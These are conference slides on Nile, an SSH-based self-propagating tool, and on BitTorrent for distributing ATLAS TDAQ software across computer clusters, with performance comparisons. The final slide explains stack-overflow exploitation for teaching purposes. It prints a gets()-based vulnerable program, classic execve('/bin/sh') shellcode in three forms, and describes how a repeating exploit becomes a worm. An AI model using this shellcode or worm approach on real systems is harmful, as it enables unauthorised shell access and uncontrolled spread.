Worm and P2P Tools for Distribution and Management of ATLAS SW on TDAQ Computer Clusters H.Garitaonandia, IFAE, Barcelona,


1 Worm and P2P Tools for Distribution and Management of ATLAS SW on TDAQ Computer Clusters. H. Garitaonandia, hegoi@ifae.es, IFAE, Barcelona, Spain. 02/14/2006, CHEP06, TIFR, Mumbai
Worm and Peer To Peer Tools for Distribution and Management of ATLAS SW on TDAQ Clusters
Hegoi Garitaonandia, IFAE, Barcelona, Spain
Haimo Zobernig, University of Wisconsin, Madison, USA

2 Outline
● Introduction and Motivation
● Nile, a Worm for Management and Distribution
● BitTorrent, a P2P for Distribution
● SW Distribution in ATLAS TDAQ
● Nile as Command Transport: Diagnostic Tools
● Conclusions and Further Work

3 Introduction and Motivation
● ATLAS SW: 6 GBytes per release. Large scale tests: over 600 nodes.
● In some clusters outside CERN there is no SW distribution tool available.
● Heterogeneous clusters.
● A lightweight tool is needed.
● Two alternatives tested, with two different technologies:
  – A worm: Nile
  – A peer-to-peer tool: BitTorrent
● Nile's additional useful feature:
  – Propagation of executables.

4 Nile, a Worm for Management and Distribution
● A script that uses worm technology to:
  – execute commands on a list of hosts
  – or copy files to/from them.
● Creates a hierarchical control network via worm propagation.
● It takes as input:
  – a list of hosts
  – a list of hosts & propagation paths.
● Shutdown and network error recovery algorithm:
  – Reliable
  – Centralized logs
● Based on Distribulator, Rgang and the Metasploit Project, but written from scratch.
● http://nile.ifae.es
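
The hierarchical control network described on this slide can be illustrated with a small sketch. It is not Nile's code: the function names, the "origin" label, the host names and the breadth-first assignment policy are all assumptions made for illustration. It only shows how a flat host list could be turned into propagation paths in which no machine contacts more than a fixed number of others.

```python
from collections import deque

def build_propagation_tree(hosts, fanout):
    """Give every host a parent so that no node has more than `fanout` children.

    Returns a dict mapping parent -> list of children. "origin" is a
    hypothetical label for the machine where the command is launched.
    """
    if fanout < 1:
        raise ValueError("fanout must be at least 1")
    tree = {}
    candidates = deque()      # hosts already placed that can accept children
    current = "origin"
    for host in hosts:
        if len(tree.get(current, [])) == fanout:
            current = candidates.popleft()   # current parent is full, move on
        tree.setdefault(current, []).append(host)
        candidates.append(host)
    return tree

def depth(tree, root="origin"):
    """Number of hops from the root to the deepest host."""
    children = tree.get(root, [])
    if not children:
        return 0
    return 1 + max(depth(tree, child) for child in children)

# Hypothetical host names; 600 nodes matches the large scale tests.
hosts = [f"node{i:03d}" for i in range(600)]
tree = build_propagation_tree(hosts, fanout=25)
print(len(tree["origin"]), depth(tree))
```

With a fan-out of 25, the 600 hosts fit in a tree that is two hops deep. A list of hosts with explicit propagation paths, the second input form on the slide, would amount to supplying such a tree by hand.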

5 Nile, a Worm for Management and Distribution: Propagation of Executables
● Features:
  – Execution of shell commands.
  – Perl script upload.
  – Run different commands on different computers.
● Recursive procedure:
  – Propagation with SSH transport to N machines (in parallel).
  – Nile protocol: inherit the SSH connection, receive a packet with routing info and payload.
  – Launch the specified executable and propagate.
● Speed benefits in a 600 node cluster:
  – The maximum number of parallel SSH processes is 25 in both cases, i.e. fewer than 25 processes per machine.
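
A rough way to see where the speed benefit comes from is to count sequential steps. The sketch below is an idealised model and not a measurement: it assumes that every batch of SSH connections takes the same time, that one machine runs at most 25 SSH processes at once, and that in worm mode every newly reached machine immediately propagates to 25 more. The function names are hypothetical.

```python
import math

def flat_batches(n_hosts, max_parallel):
    """Sequential batches needed when a single machine contacts every host."""
    return math.ceil(n_hosts / max_parallel)

def worm_rounds(n_hosts, max_parallel):
    """Propagation rounds needed when every reached host propagates further."""
    reached, frontier, rounds = 0, 1, 0
    while reached < n_hosts:
        frontier *= max_parallel   # each node in the frontier reaches max_parallel new hosts
        reached += frontier
        rounds += 1
    return rounds

print(flat_batches(600, 25), worm_rounds(600, 25))
```

Under these assumptions a single machine needs 24 batches to reach 600 nodes, while the recursive procedure needs 2 rounds with the same per-machine limit.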

6 Nile, a Worm for Management and Distribution: File Distribution and Synchronization
● Features:
  – Incremental synchronization of the directories of many computers with a directory on the main computer.
  – Copy files from many computers to the main one.
  – Via RSYNC on top of SSH or RSYNC on top of TCP.
● Procedure:
  – Similar to Nile in copy mode.
  – But each node synchronizes before the worm jumps to the next machines.
● Throughput benefits: [figure not reproduced in this transcript]
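
The two transports named on this slide correspond to the two standard ways of invoking rsync. The sketch below only builds the command lines; it does not show how Nile itself calls rsync. The host name, the paths and the daemon module name are hypothetical.

```python
import shlex

def rsync_over_ssh(src_dir, host, dest_dir):
    """rsync tunnelled through SSH: -a preserves attributes, -e selects the remote shell."""
    return ["rsync", "-a", "-e", "ssh", f"{src_dir}/", f"{host}:{dest_dir}/"]

def rsync_over_tcp(src_dir, host, module):
    """rsync talking directly to an rsync daemon (HOST::MODULE syntax)."""
    return ["rsync", "-a", f"{src_dir}/", f"{host}::{module}/"]

# Hypothetical host, paths and module name, for illustration only.
ssh_cmd = rsync_over_ssh("/sw/atlas", "node001", "/sw/atlas")
tcp_cmd = rsync_over_tcp("/sw/atlas", "node001", "atlas")
print(shlex.join(ssh_cmd))
print(shlex.join(tcp_cmd))
```

In both forms rsync transfers only the differences between source and destination, which is what makes the synchronization incremental.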

7 A P2P for File Distribution: BitTorrent (1)
● A distributed file sharing SW which adapts to the network topology.
● Architecture:
  – Peers
  – Seeder
  – Metainformation file:
    ● File pieces information.
    ● Pointer to the tracker.
  – Tracker
  – An adaptive algorithm
● Nile can be used to launch, check, monitor, and stop the BitTorrent network.
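
The two parts of the metainformation file can be made concrete with a short sketch. It uses the standard BitTorrent metainfo keys ("announce" for the tracker, "info" with "piece length" and the concatenated SHA-1 digests in "pieces"), but it is only an illustration: real .torrent files are bencoded, and the file name, tracker URL and piece size here are hypothetical.

```python
import hashlib

def build_metainfo(name, data, tracker_url, piece_length=256 * 1024):
    """Return a dict with the fields a single-file BitTorrent metainfo carries."""
    # File pieces information: one 20-byte SHA-1 digest per fixed-size piece.
    pieces = b"".join(
        hashlib.sha1(data[i:i + piece_length]).digest()
        for i in range(0, len(data), piece_length)
    )
    return {
        "announce": tracker_url,   # pointer to the tracker
        "info": {
            "name": name,
            "length": len(data),
            "piece length": piece_length,
            "pieces": pieces,
        },
    }

# Hypothetical payload and tracker address, for illustration only.
meta = build_metainfo(
    "atlas-sw.img", b"x" * 1_000_000, "http://tracker.example.org:6969/announce"
)
print(len(meta["info"]["pieces"]) // 20, "pieces")
```

Peers use the digests to verify each piece independently, which is what lets them fetch different pieces from different peers.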

8 A P2P for File Distribution: BitTorrent (2)

9 Quattor
● Quattor is a system administration toolkit:
  – automated installation
  – configuration and management of clusters
● Publish & Pull architecture.
● Can be configured with many SW repositories.
● But it wasn't used in these tests:
  – Its behaviour was emulated.
  – Simplest configuration: 1 repository.
  – HTTP, no Squid caches.

10 File Distribution in ATLAS TDAQ
● Two big tests with these tools so far:
  – Large scale tests (see D.Burckhart's talk)
  – Pre-Series (see G.Unel's talk), (see M.Dobson's talk)
● Different working conditions.
● Only one direct comparison.
● Though some aspects cannot really be compared.

11 SW Distribution in Large Scale Tests with Unknown Network Topology
● A 2 GByte container file with the ATLAS TDAQ SW had to be installed locally on 600 machines at CERN.
● The computers were spread over different physical locations:
  – Virtual cluster.
  – No clear knowledge of the network topology.
● There were incompatibilities between the packaging systems:
  – ATLAS SW
  – The official one in the cluster, RPM.
● The distribution of this file was an appropriate task for a P2P tool:
  – BitTorrent 3.4

12 SW Distribution in Large Scale Tests with Unknown Network Topology
● BitTorrent:
  – Adapted to the network topology.
  – Performed better.
● With BT, when the number of nodes was increased:
  – The corresponding switches from their labs were added.
  – The throughput increased.
● The bottleneck for the parallel copy was the closest router:
  – A 100 Mbps one in the first tests, then a 200 Mbps one.
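
The effect of the router bottleneck on the parallel copy can be estimated with simple arithmetic. The sketch below is an idealised lower bound, not a measured result: it assumes that every copy of the file crosses the same router, that the link is fully used, and that 1 GByte is 10^9 bytes. The file size and node count are the figures quoted for the large scale tests (2 GByte, 600 machines).

```python
def parallel_copy_hours(file_bytes, n_nodes, bottleneck_bits_per_s):
    """Time to push one copy per node through a single shared link, in hours."""
    total_bits = file_bytes * 8 * n_nodes
    return total_bits / bottleneck_bits_per_s / 3600

FILE_BYTES = 2 * 10**9   # 2 GByte container file
N_NODES = 600

for mbps in (100, 200):
    hours = parallel_copy_hours(FILE_BYTES, N_NODES, mbps * 10**6)
    print(f"{mbps} Mbps bottleneck: at least {hours:.1f} h")
```

Under these assumptions the copy cannot finish in less than roughly 26.7 hours at 100 Mbps or 13.3 hours at 200 Mbps. BitTorrent avoids this limit because most pieces are exchanged between peers behind other switches rather than through the single router.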

13 SW Distribution in Pre-Series with Known Network Topology
● Pre-Series is a small scale (10%) version of the final ATLAS TDAQ system (70 nodes).
● Its control network is the one in the figure above, with N=4 and a different M for each switch.
● Nile is being used to synchronize the ATLAS SW, which is installed locally on all the machines with a disk.
● Some performance measurements were taken (4 per point) with BT, Nile, and an emulation of a simple Quattor configuration, for N=3 and M=4, 6 and 8.

14 SW Distribution in Pre-Series with Known Network Topology
● Nile 2.0.2 configured in two stages:
  – Performed the best of all three.
  – Throughput was close to the expected value.
● The parallel copy can be understood as the simplest Quattor configuration:
  – Only one SW repository, HTTP, no Squid caches.

15 Nile as Command Transport: TDAQ Diagnostic Tools
● Nile in execute mode can be used as a transport mechanism by other tools:
  – Reliable.
  – Centralized logs.
● A set of tools, currently under development, is being built on top of Nile.
● Their objective is to provide quickly:
  – Unix resource monitoring.
  – TDAQ infrastructure monitoring and diagnostics.
  – Deallocation of resources.
  – Diagnostics, etc.

16 Conclusions
● When no SW package distribution tool is available:
  – A (temporary?) solution is needed.
  – P2P & Worm
● The P2P BitTorrent:
  – Its adaptability makes it suitable for unknown network topologies.
  – Nile or a similar tool must be used to launch BT.
● The worm Nile:
  – Performs better for known & more symmetrical network topologies.
  – It can synchronize incrementally.
● Nile alone, or the combination of both, for:
  – Future large scale tests outside CERN.
  – Network commissioning.
● Nile is useful for command transport:
  – Applications on top of it.
  – TDAQ specific applications.

17 Further Work
● Keep improving Nile.
● Develop TDAQ specific tools on top of Nile.
● Integration of BitTorrent with Quattor:
  – Both pull oriented.
● File system on top of P2P?

18 ?
● http://nile.ifae.es
● http://www.bittorrent.com
● http://quattor.org
● http://fermitools.fnal.gov/rgang
● http://www.metasploit.com
● http://distribulator.sourceforge.net

19 Worms in a Nutshell: Hacking for Dummies
Exploiting a C/C++ Stack Overflow Bug
Diagram labels: Text, Stack, Data; parameters for func. call; environment variables; main's stack frame; return address; saved frame pointer; local vars (e.g. a char buffer); lower address; new return address.
The buggy program:
main(){ buggy(); }
buggy(){ char buf[12]; gets(buf); }
3 ways of saying the same thing:
(a) As bytes:
char shellcode[] =
"\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
"\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
"\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
(b) As assembly (the code first gets a reference to itself, because it needs to know where it is being executed):
jmp 0x2a # 3 bytes
popl %esi # 1 byte
movl %esi,0x8(%esi) # 3 bytes
movb $0x0,0x7(%esi) # 4 bytes
movl $0x0,0xc(%esi) # 7 bytes
movl $0xb,%eax # 5 bytes
movl %esi,%ebx # 2 bytes
leal 0x8(%esi),%ecx # 3 bytes
leal 0xc(%esi),%edx # 3 bytes
int $0x80 # 2 bytes
movl $0x1, %eax # 5 bytes
movl $0x0, %ebx # 5 bytes
int $0x80 # 2 bytes
call -0x2f # 5 bytes
.string \"/bin/sh\" # 8 bytes
(c) As C:
name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); exit(0);
The exploit: 1) negotiate with the program's protocol, 2) send the shellcode.
If, instead of execve("/bin/sh"), the shellcode repeats (1) & (2): WORM

